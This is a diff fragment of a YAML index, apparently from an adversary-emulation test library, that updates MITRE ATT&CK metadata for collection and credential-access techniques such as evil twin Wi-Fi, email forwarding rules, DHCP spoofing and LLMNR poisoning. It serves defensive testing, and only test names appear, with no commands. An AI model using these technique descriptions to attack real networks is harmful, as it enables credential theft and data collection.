     atomic_tests:
     - name: Utilize Clipboard to store or execute commands from
@@ -82357,7 +82839,7 @@ collection:
         name: sh
   T1530:
     technique:
-      modified: '2023-09-29T16:11:43.530Z'
+      modified: '2024-10-14T22:11:30.271Z'
       name: Data from Cloud Storage Object
       description: "Adversaries may access data from cloud storage.\n\nMany IaaS providers
         offer solutions for online data object storage such as Amazon S3, Azure Storage,
@@ -82391,10 +82873,12 @@ collection:
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: collection
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_contributors:
       - Netskope
       - Praetorian
       - AppOmni
+      - Arun Seelagan, CISA
       x_mitre_deprecated: false
       x_mitre_detection: Monitor for unusual queries to the cloud provider's storage
         service. Activity originating from unexpected sources may indicate improper
@@ -82405,13 +82889,14 @@ collection:
       x_mitre_domains:
       - enterprise-attack
       x_mitre_is_subtechnique: false
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_platforms:
       - IaaS
       - SaaS
-      - Google Workspace
-      - Office 365
-      x_mitre_version: '2.1'
+      - Office Suite
+      x_mitre_version: '2.2'
       x_mitre_data_sources:
+      - 'Cloud Service: Cloud Service Metadata'
       - 'Cloud Storage: Cloud Storage Access'
       type: attack-pattern
       id: attack-pattern--3298ce88-1628-43b1-87d9-0b5336b193d7
@@ -82452,9 +82937,6 @@ collection:
         url: https://www.trendmicro.com/vinfo/us/security/news/virtualization-and-cloud/a-misconfigured-amazon-s3-exposed-almost-50-thousand-pii-in-australia
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.2.0
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1530
     atomic_tests:
     - name: Azure - Enumerate Azure Blobs with MicroBurst
@@ -82584,30 +83066,7 @@ collection:
         elevation_required: false
   T1074.002:
     technique:
-      x_mitre_platforms:
-      - Windows
-      - IaaS
-      - Linux
-      - macOS
-      x_mitre_domains:
-      - enterprise-attack
-      x_mitre_contributors:
-      - Praetorian
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--359b00ad-9425-420b-bba5-6de8d600cbc0
-      type: attack-pattern
-      created: '2020-03-13T21:14:58.206Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      external_references:
-      - source_name: mitre-attack
-        external_id: T1074.002
-        url: https://attack.mitre.org/techniques/T1074/002
-      - source_name: Mandiant M-Trends 2020
-        url: https://content.fireeye.com/m-trends/rpt-m-trends-2020
-        description: Mandiant. (2020, February). M-Trends 2020. Retrieved April 24,
-          2020.
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2024-09-30T13:28:37.414Z'
       name: Remote Data Staging
       description: |-
         Adversaries may stage data collected from multiple systems in a central location or directory on one system prior to Exfiltration. Data may be kept in separate files or combined into one file through techniques such as [Archive Collected Data](https://attack.mitre.org/techniques/T1560). Interactive command shells may be used, and common functionality within [cmd](https://attack.mitre.org/software/S0106) and bash may be used to copy data into a staging location.
@@ -82618,23 +83077,47 @@ collection:
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: collection
+      x_mitre_contributors:
+      - Praetorian
+      x_mitre_deprecated: false
       x_mitre_detection: |-
         Processes that appear to be reading files from disparate locations and writing them to the same directory or file may be an indication of data being staged, especially if they are suspected of performing encryption or compression on the files, such as 7zip, RAR, ZIP, or zlib. Monitor publicly writeable directories, central locations, and commonly used staging directories (recycle bin, temp folders, etc.) to regularly check for compressed or encrypted data that may be indicative of staging.
 
         Monitor processes and command-line arguments for actions that could be taken to collect and combine files. Remote access tools with built-in features may interact directly with the Windows API to gather and copy to a location. Data may also be acquired and staged through Windows system management tools such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) and [PowerShell](https://attack.mitre.org/techniques/T1059/001).
+      x_mitre_domains:
+      - enterprise-attack
       x_mitre_is_subtechnique: true
+      x_mitre_platforms:
+      - Windows
+      - IaaS
+      - Linux
+      - macOS
       x_mitre_version: '1.1'
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_data_sources:
       - 'File: File Creation'
       - 'Command: Command Execution'
       - 'File: File Access'
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
+      type: attack-pattern
+      id: attack-pattern--359b00ad-9425-420b-bba5-6de8d600cbc0
+      created: '2020-03-13T21:14:58.206Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1074/002
+        external_id: T1074.002
+      - source_name: Mandiant M-Trends 2020
+        description: Mandiant. (2020, February). M-Trends 2020. Retrieved April 24,
+          2020.
+        url: https://www.mandiant.com/sites/default/files/2021-09/mtrends-2020.pdf
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
     atomic_tests: []
   T1005:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2023-04-12T23:54:39.466Z'
       name: Data from Local System
       description: |
         Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.
@@ -82704,7 +83187,6 @@ collection:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1005
     atomic_tests:
     - name: Search files of interest and save them to a single zip file (Windows)
@@ -82814,7 +83296,7 @@ collection:
         description: Wikipedia. (2016, March 31). List of file signatures. Retrieved
           April 22, 2016.
         source_name: Wikipedia File Header Signatures
-      modified: '2021-04-29T14:49:39.188Z'
+      modified: '2020-03-29T18:27:30.891Z'
       name: 'Archive Collected Data: Archive via Library'
       description: |-
         An adversary may compress or encrypt data that is collected prior to exfiltration using 3rd party libraries. Many libraries exist that can archive data, including [Python](https://attack.mitre.org/techniques/T1059/006) rarfile (Citation: PyPI RAR), libzip (Citation: libzip), and zlib (Citation: Zlib Github). Most libraries include functionality to encrypt and/or compress data.
@@ -82833,8 +83315,6 @@ collection:
       x_mitre_data_sources:
       - 'Script: Script Execution'
       - 'File: File Creation'
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
       identifier: T1560.002
     atomic_tests:
     - name: Compressing data using GZip in Python (FreeBSD/Linux)
@@ -82981,6 +83461,87 @@ collection:
         cleanup_command: 'rm #{path_to_output_file}
 
           '
+  T1557.004:
+    technique:
+      modified: '2024-11-11T18:52:53.686Z'
+      name: Evil Twin
+      description: "Adversaries may host seemingly genuine Wi-Fi access points to
+        deceive users into connecting to malicious networks as a way of supporting
+        follow-on behaviors such as [Network Sniffing](https://attack.mitre.org/techniques/T1040),
+        [Transmitted Data Manipulation](https://attack.mitre.org/techniques/T1565/002),
+        or [Input Capture](https://attack.mitre.org/techniques/T1056).(Citation: Australia
+        ‘Evil Twin’)\n\nBy using a Service Set Identifier (SSID) of a legitimate Wi-Fi
+        network, fraudulent Wi-Fi access points may trick devices or users into connecting
+        to malicious Wi-Fi networks.(Citation: Kaspersky evil twin)(Citation: medium
+        evil twin)  Adversaries may provide a stronger signal strength or block access
+        to Wi-Fi access points to coerce or entice victim devices into connecting
+        to malicious networks.(Citation: specter ops evil twin)  A Wi-Fi Pineapple
+        – a network security auditing and penetration testing tool – may be deployed
+        in Evil Twin attacks for ease of use and broader range. Custom certificates
+        may be used in an attempt to intercept HTTPS traffic. \n\nSimilarly, adversaries
+        may also listen for client devices sending probe requests for known or previously
+        connected networks (Preferred Network Lists or PNLs). When a malicious access
+        point receives a probe request, adversaries can respond with the same SSID
+        to imitate the trusted, known network.(Citation: specter ops evil twin)  Victim
+        devices are led to believe the responding access point is from their PNL and
+        initiate a connection to the fraudulent network.\n\nUpon logging into the
+        malicious Wi-Fi access point, a user may be directed to a fake login page
+        or captive portal webpage to capture the victim’s credentials. Once a user
+        is logged into the fraudulent Wi-Fi network, the adversary may able to monitor
+        network activity, manipulate data, or steal additional credentials. Locations
+        with high concentrations of public Wi-Fi access, such as airports, coffee
+        shops, or libraries, may be targets for adversaries to set up illegitimate
+        Wi-Fi access points. "
+      kill_chain_phases:
+      - kill_chain_name: mitre-attack
+        phase_name: credential-access
+      - kill_chain_name: mitre-attack
+        phase_name: collection
+      x_mitre_contributors:
+      - Menachem Goldstein
+      - DeFord L. Smith
+      x_mitre_deprecated: false
+      x_mitre_detection: ''
+      x_mitre_domains:
+      - enterprise-attack
+      x_mitre_is_subtechnique: true
+      x_mitre_platforms:
+      - Network
+      x_mitre_version: '1.0'
+      x_mitre_data_sources:
+      - 'Network Traffic: Network Traffic Content'
+      - 'Network Traffic: Network Traffic Flow'
+      type: attack-pattern
+      id: attack-pattern--48b836c6-e4ca-435a-82a3-29c03e5b492e
+      created: '2024-09-17T14:27:40.947Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1557/004
+        external_id: T1557.004
+      - source_name: Kaspersky evil twin
+        description: AO Kaspersky Lab. (n.d.). Evil twin attacks and how to prevent
+          them. Retrieved September 17, 2024.
+        url: https://usa.kaspersky.com/resource-center/preemptive-safety/evil-twin-attacks
+      - source_name: medium evil twin
+        description: Gihan, Kavishka. (2021, August 8). Wireless Security— Evil Twin
+          Attack. Retrieved September 17, 2024.
+        url: https://kavigihan.medium.com/wireless-security-evil-twin-attack-d3842f4aef59
+      - source_name: specter ops evil twin
+        description: Ryan, Gabriel. (2019, October 28). Modern Wireless Tradecraft
+          Pt I — Basic Rogue AP Theory — Evil Twin and Karma Attacks. Retrieved September
+          17, 2024.
+        url: https://posts.specterops.io/modern-wireless-attacks-pt-i-basic-rogue-ap-theory-evil-twin-and-karma-attacks-35a8571550ee
+      - source_name: Australia ‘Evil Twin’
+        description: Toulas, Bill. (2024, July 1). Australian charged for ‘Evil Twin’
+          WiFi attack on plane. Retrieved September 17, 2024.
+        url: https://www.bleepingcomputer.com/news/security/australian-charged-for-evil-twin-wifi-attack-on-plane/
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+    atomic_tests: []
   T1602.002:
     technique:
       x_mitre_platforms:
@@ -83009,7 +83570,7 @@ collection:
         url: https://www.us-cert.gov/ncas/alerts/TA18-086A
         description: US-CERT. (2018, March 27). TA18-068A Brute Force Attacks Conducted
           by Cyber Actors. Retrieved October 2, 2019.
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2022-02-17T19:50:46.948Z'
       name: Network Device Configuration Dump
       description: "Adversaries may access network configuration files to collect
         sensitive data about the device and the network. The network configuration
@@ -83039,8 +83600,6 @@ collection:
       - 'Network Traffic: Network Traffic Content'
       x_mitre_permissions_required:
       - Administrator
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1560:
     technique:
@@ -83094,7 +83653,6 @@ collection:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1560
     atomic_tests:
     - name: Compress Data for Exfiltration With PowerShell
@@ -83155,7 +83713,7 @@ collection:
         description: Strategic Cyber LLC. (2017, March 14). Cobalt Strike Manual.
           Retrieved May 24, 2017.
         source_name: cobaltstrike manual
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2022-02-25T18:58:15.229Z'
       name: Browser Session Hijacking
       description: |-
         Adversaries may take advantage of security vulnerabilities and inherent functionality in browser software to change content, modify user-behaviors, and intercept information as part of various browser session hijacking techniques.(Citation: Wikipedia Man in the Browser)
@@ -83183,12 +83741,10 @@ collection:
       - Administrator
       - SYSTEM
       x_mitre_is_subtechnique: false
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1557.003:
     technique:
-      modified: '2022-11-08T14:00:00.188Z'
+      modified: '2024-09-12T19:46:04.759Z'
       name: DHCP Spoofing
       description: "Adversaries may redirect network traffic to adversary-owned systems
         by spoofing Dynamic Host Configuration Protocol (DHCP) traffic and acting
@@ -83225,23 +83781,23 @@ collection:
         phase_name: credential-access
       - kill_chain_name: mitre-attack
         phase_name: collection
+      x_mitre_contributors:
+      - Alex Spivakovsky, Pentera
+      - Andrew Allen, @whitehat_zero
+      x_mitre_deprecated: false
       x_mitre_detection: 'Monitor network traffic for suspicious/malicious behavior
         involving DHCP, such as changes in DNS and/or gateway parameters. Additionally,
         monitor Windows logs for Event IDs (EIDs) 1341, 1342, 1020 and 1063, which
         specify that the IP allocations are low or have run out; these EIDs may indicate
         a denial of service attack.(Citation: dhcp_serv_op_events)(Citation: solution_monitor_dhcp_scopes)'
+      x_mitre_domains:
+      - enterprise-attack
+      x_mitre_is_subtechnique: true
       x_mitre_platforms:
       - Linux
       - Windows
       - macOS
-      x_mitre_is_subtechnique: true
-      x_mitre_deprecated: false
-      x_mitre_domains:
-      - enterprise-attack
       x_mitre_version: '1.1'
-      x_mitre_contributors:
-      - Alex Spivakovsky, Pentera
-      - Andrew Allen, @whitehat_zero
       x_mitre_data_sources:
       - 'Network Traffic: Network Traffic Content'
       - 'Application Log: Application Log Content'
@@ -83274,21 +83830,20 @@ collection:
       - source_name: solution_monitor_dhcp_scopes
         description: 'Shoemaker, E. (2015, December 31). Solution: Monitor DHCP Scopes
           and Detect Man-in-the-Middle Attacks with PRTG and PowerShell. Retrieved
-          March 7, 2022.'
-        url: https://lockstepgroup.com/blog/monitor-dhcp-scopes-and-detect-man-in-the-middle-attacks/
+          September 12, 2024.'
+        url: https://web.archive.org/web/20231202025258/https://lockstepgroup.com/blog/monitor-dhcp-scopes-and-detect-man-in-the-middle-attacks/
       - source_name: w32.tidserv.g
         description: Symantec. (2009, March 22). W32.Tidserv.G. Retrieved January
           14, 2022.
         url: https://web.archive.org/web/20150923175837/http://www.symantec.com/security_response/writeup.jsp?docid=2009-032211-2952-99&tabid=2
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 2.1.0
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1557.001:
     technique:
-      modified: '2023-04-25T14:00:00.188Z'
+      modified: '2022-10-25T15:46:55.393Z'
       name: 'Adversary-in-the-Middle: LLMNR/NBT-NS Poisoning and SMB Relay'
       description: "By responding to LLMNR/NBT-NS network traffic, adversaries may
         spoof an authoritative source for name resolution to force communication with
@@ -83396,7 +83951,6 @@ collection:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.0.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1557.001
     atomic_tests:
     - name: LLMNR Poisoning with Inveigh (PowerShell)
@@ -83415,7 +83969,7 @@ collection:
         elevation_required: true
   T1056.003:
     technique:
-      modified: '2023-03-30T21:01:46.711Z'
+      modified: '2024-10-15T16:43:43.849Z'
       name: Web Portal Capture
       description: |-
         Adversaries may install code on externally facing portals, such as a VPN login page, to capture and transmit credentials of users who attempt to log into the service. For example, a compromised login page may log provided user credentials before logging the user in to the service.
@@ -83426,13 +83980,13 @@ collection:
         phase_name: collection
       - kill_chain_name: mitre-attack
         phase_name: credential-access
+      x_mitre_deprecated: false
       x_mitre_detection: File monitoring may be used to detect changes to files in
         the Web directory for organization login pages that do not match with authorized
         updates to the Web server's content.
       x_mitre_domains:
       - enterprise-attack
       x_mitre_is_subtechnique: true
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_platforms:
       - Linux
       - macOS
@@ -83446,6 +84000,7 @@ collection:
       id: attack-pattern--69e5226d-05dc-4f15-95d7-44f5ed78d06e
       created: '2020-02-11T18:59:50.058Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
       external_references:
       - source_name: mitre-attack
         url: https://attack.mitre.org/techniques/T1056/003
@@ -83456,12 +84011,12 @@ collection:
         url: https://www.volexity.com/blog/2015/10/07/virtual-private-keylogging-cisco-web-vpns-leveraged-for-access-and-persistence/
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
-      spec_version: '2.1'
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
     atomic_tests: []
   T1125:
     technique:
-      modified: '2023-10-31T14:00:00.188Z'
+      modified: '2023-03-30T21:01:37.205Z'
       name: Video Capture
       description: |-
         An adversary can leverage a computer's peripheral devices (e.g., integrated cameras or webcams) or applications (e.g., video call services) to capture video recordings for the purpose of gathering information. Images may also be captured from devices or applications, potentially in specified intervals, in lieu of video files.
@@ -83506,7 +84061,6 @@ collection:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_is_subtechnique: false
-      spec_version: '2.1'
       identifier: T1125
     atomic_tests:
     - name: Registry artefact when application use webcam
@@ -83525,25 +84079,7 @@ collection:
         name: command_prompt
   T1213.001:
     technique:
-      x_mitre_platforms:
-      - SaaS
-      x_mitre_domains:
-      - enterprise-attack
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--7ad38ef1-381a-406d-872a-38b136eb5ecc
-      type: attack-pattern
-      created: '2020-02-14T13:09:51.004Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      external_references:
-      - source_name: mitre-attack
-        external_id: T1213.001
-        url: https://attack.mitre.org/techniques/T1213/001
-      - url: https://confluence.atlassian.com/confkb/how-to-enable-user-access-logging-182943.html
-        description: Atlassian. (2018, January 9). How to Enable User Access Logging.
-          Retrieved April 4, 2018.
-        source_name: Atlassian Confluence Logging
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2024-08-30T13:45:42.840Z'
       name: Confluence
       description: |2
 
@@ -83553,31 +84089,48 @@ collection:
         * Physical / logical network diagrams
         * System architecture diagrams
         * Technical system documentation
-        * Testing / development credentials
+        * Testing / development credentials (i.e., [Unsecured Credentials](https://attack.mitre.org/techniques/T1552))
         * Work / project schedules
         * Source code snippets
         * Links to network shares and other internal resources
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: collection
+      x_mitre_deprecated: false
       x_mitre_detection: |-
         Monitor access to Confluence repositories performed by privileged users (for example, Active Directory Domain, Enterprise, or Schema Administrators) as these types of accounts should generally not be used to access information repositories. If the capability exists, it may be of value to monitor and alert on users that are retrieving and viewing a large number of documents and pages; this behavior may be indicative of programmatic means being used to retrieve all data within the repository. In environments with high-maturity, it may be possible to leverage User-Behavioral Analytics (UBA) platforms to detect and alert on user based anomalies.
 
         User access logging within Atlassian's Confluence can be configured to report access to certain pages and documents through AccessLogFilter. (Citation: Atlassian Confluence Logging) Additional log storage and analysis infrastructure will likely be required for more robust detection capabilities.
+      x_mitre_domains:
+      - enterprise-attack
       x_mitre_is_subtechnique: true
-      x_mitre_version: '1.0'
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      x_mitre_platforms:
+      - SaaS
+      x_mitre_version: '1.1'
       x_mitre_data_sources:
       - 'Logon Session: Logon Session Creation'
       - 'Application Log: Application Log Content'
-      x_mitre_permissions_required:
-      - User
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
+      type: attack-pattern
+      id: attack-pattern--7ad38ef1-381a-406d-872a-38b136eb5ecc
+      created: '2020-02-14T13:09:51.004Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1213/001
+        external_id: T1213.001
+      - source_name: Atlassian Confluence Logging
+        description: Atlassian. (2018, January 9). How to Enable User Access Logging.
+          Retrieved April 4, 2018.
+        url: https://confluence.atlassian.com/confkb/how-to-enable-user-access-logging-182943.html
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
     atomic_tests: []
   T1114.003:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2024-10-14T22:11:30.271Z'
       name: 'Email Collection: Email Forwarding Rule'
       description: "Adversaries may setup email forwarding rules to collect sensitive
         information. Adversaries may abuse email forwarding rules to monitor the activities
@@ -83610,10 +84163,12 @@ collection:
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: collection
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_contributors:
       - Microsoft Security
       - Swetha Prabakaran, Microsoft Threat Intelligence Center (MSTIC)
       - Liran Ravich, CardinalOps
+      - Arun Seelagan, CISA
       x_mitre_deprecated: false
       x_mitre_detection: |-
         Detection is challenging because all messages forwarded because of an auto-forwarding rule have the same presentation as a manually forwarded message. It is also possible for the user to not be aware of the addition of such an auto-forwarding rule and not suspect that their account has been compromised; email-forwarding rules alone will not affect the normal usage patterns or operations of the email account. This is especially true in cases with hidden auto-forwarding rules. This makes it only possible to reliably detect the existence of a hidden auto-forwarding rule by examining message tracking logs or by using a MAPI editor to notice the modified rule property values.(Citation: Pfammatter - Hidden Inbox Rules)
@@ -83622,16 +84177,17 @@ collection:
       x_mitre_domains:
       - enterprise-attack
       x_mitre_is_subtechnique: true
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_platforms:
-      - Office 365
       - Windows
-      - Google Workspace
       - macOS
       - Linux
-      x_mitre_version: '1.3'
+      - Office Suite
+      x_mitre_version: '1.4'
       x_mitre_data_sources:
       - 'Command: Command Execution'
       - 'Application Log: Application Log Content'
+      - 'Cloud Service: Cloud Service Metadata'
       type: attack-pattern
       id: attack-pattern--7d77a07d-02fe-4e88-8bd9-e9c008c01bf0
       created: '2020-02-19T18:54:47.103Z'
@@ -83663,9 +84219,6 @@ collection:
         url: https://www.us-cert.gov/ncas/alerts/TA18-086A
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1114.003
     atomic_tests:
     - name: Office365 - Email Forwarding
@@ -83718,63 +84271,62 @@ collection:
         elevation_required: false
   T1074:
     technique:
-      x_mitre_platforms:
-      - Windows
-      - IaaS
-      - Linux
-      - macOS
-      x_mitre_domains:
-      - enterprise-attack
-      x_mitre_contributors:
-      - Praetorian
-      - Shane Tully, @securitygypsy
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      type: attack-pattern
-      id: attack-pattern--7dd95ff6-712e-4056-9626-312ea4ab4c5e
-      created: '2017-05-31T21:30:58.938Z'
-      x_mitre_version: '1.4'
-      external_references:
-      - source_name: mitre-attack
-        external_id: T1074
-        url: https://attack.mitre.org/techniques/T1074
-      - source_name: Mandiant M-Trends 2020
-        url: https://content.fireeye.com/m-trends/rpt-m-trends-2020
-        description: Mandiant. (2020, February). M-Trends 2020. Retrieved April 24,
-          2020.
-      - source_name: PWC Cloud Hopper April 2017
-        url: https://web.archive.org/web/20220224041316/https:/www.pwc.co.uk/cyber-security/pdf/cloud-hopper-report-final-v4.pdf
-        description: PwC and BAE Systems. (2017, April). Operation Cloud Hopper. Retrieved
-          April 5, 2017.
-      x_mitre_deprecated: false
-      revoked: false
+      modified: '2024-09-30T13:28:37.415Z'
+      name: Data Staged
       description: |-
         Adversaries may stage collected data in a central location or directory prior to Exfiltration. Data may be kept in separate files or combined into one file through techniques such as [Archive Collected Data](https://attack.mitre.org/techniques/T1560). Interactive command shells may be used, and common functionality within [cmd](https://attack.mitre.org/software/S0106) and bash may be used to copy data into a staging location.(Citation: PWC Cloud Hopper April 2017)
 
         In cloud environments, adversaries may stage data within a particular instance or virtual machine before exfiltration. An adversary may [Create Cloud Instance](https://attack.mitre.org/techniques/T1578/002) and stage data in that instance.(Citation: Mandiant M-Trends 2020)
 
         Adversaries may choose to stage data from a victim network in a centralized location prior to Exfiltration to minimize the number of connections made to their C2 server and better evade detection.
-      modified: '2022-11-08T14:00:00.188Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      name: Data Staged
+      kill_chain_phases:
+      - kill_chain_name: mitre-attack
+        phase_name: collection
+      x_mitre_contributors:
+      - Praetorian
+      - Shane Tully, @securitygypsy
+      x_mitre_deprecated: false
       x_mitre_detection: |-
         Processes that appear to be reading files from disparate locations and writing them to the same directory or file may be an indication of data being staged, especially if they are suspected of performing encryption or compression on the files, such as 7zip, RAR, ZIP, or zlib. Monitor publicly writeable directories, central locations, and commonly used staging directories (recycle bin, temp folders, etc.) to regularly check for compressed or encrypted data that may be indicative of staging.
 
         Monitor processes and command-line arguments for actions that could be taken to collect and combine files. Remote access tools with built-in features may interact directly with the Windows API to gather and copy to a location. Data may also be acquired and staged through Windows system management tools such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) and [PowerShell](https://attack.mitre.org/techniques/T1059/001).
 
         Consider monitoring accesses and modifications to storage repositories (such as the Windows Registry), especially from suspicious processes that could be related to malicious data collection.
-      kill_chain_phases:
-      - kill_chain_name: mitre-attack
-        phase_name: collection
+      x_mitre_domains:
+      - enterprise-attack
       x_mitre_is_subtechnique: false
+      x_mitre_platforms:
+      - Windows
+      - IaaS
+      - Linux
+      - macOS
+      x_mitre_version: '1.4'
       x_mitre_data_sources:
       - 'File: File Access'
       - 'File: File Creation'
       - 'Windows Registry: Windows Registry Key Modification'
       - 'Command: Command Execution'
-      x_mitre_attack_spec_version: 2.1.0
+      type: attack-pattern
+      id: attack-pattern--7dd95ff6-712e-4056-9626-312ea4ab4c5e
+      created: '2017-05-31T21:30:58.938Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1074
+        external_id: T1074
+      - source_name: Mandiant M-Trends 2020
+        description: Mandiant. (2020, February). M-Trends 2020. Retrieved April 24,
+          2020.
+        url: https://www.mandiant.com/sites/default/files/2021-09/mtrends-2020.pdf
+      - source_name: PWC Cloud Hopper April 2017
+        description: PwC and BAE Systems. (2017, April). Operation Cloud Hopper. Retrieved
+          April 5, 2017.
+        url: https://web.archive.org/web/20220224041316/https:/www.pwc.co.uk/cyber-security/pdf/cloud-hopper-report-final-v4.pdf
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1056.002:
     technique:
@@ -83847,7 +84399,6 @@ collection:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1056.002
     atomic_tests:
     - name: AppleScript - Prompt User for Password
@@ -83946,7 +84497,6 @@ collection:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1039
     atomic_tests:
     - name: Copy a sensitive File over Administrative share with copy
@@ -84047,7 +84597,7 @@ collection:
         elevation_required: true
   T1114.002:
     technique:
-      modified: '2023-05-31T12:34:03.420Z'
+      modified: '2024-10-14T22:11:30.271Z'
       name: 'Email Collection: Remote Email Collection'
       description: Adversaries may target an Exchange server, Office 365, or Google
         Workspace to collect sensitive information. Adversaries may leverage a user's
@@ -84059,6 +84609,9 @@ collection:
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: collection
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_contributors:
+      - Arun Seelagan, CISA
       x_mitre_deprecated: false
       x_mitre_detection: 'Monitor for unusual login activity from unknown or abnormal
         locations, especially for privileged accounts (ex: Exchange administrator
@@ -84066,11 +84619,11 @@ collection:
       x_mitre_domains:
       - enterprise-attack
       x_mitre_is_subtechnique: true
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_platforms:
-      - Office 365
       - Windows
-      - Google Workspace
-      x_mitre_version: '1.2'
+      - Office Suite
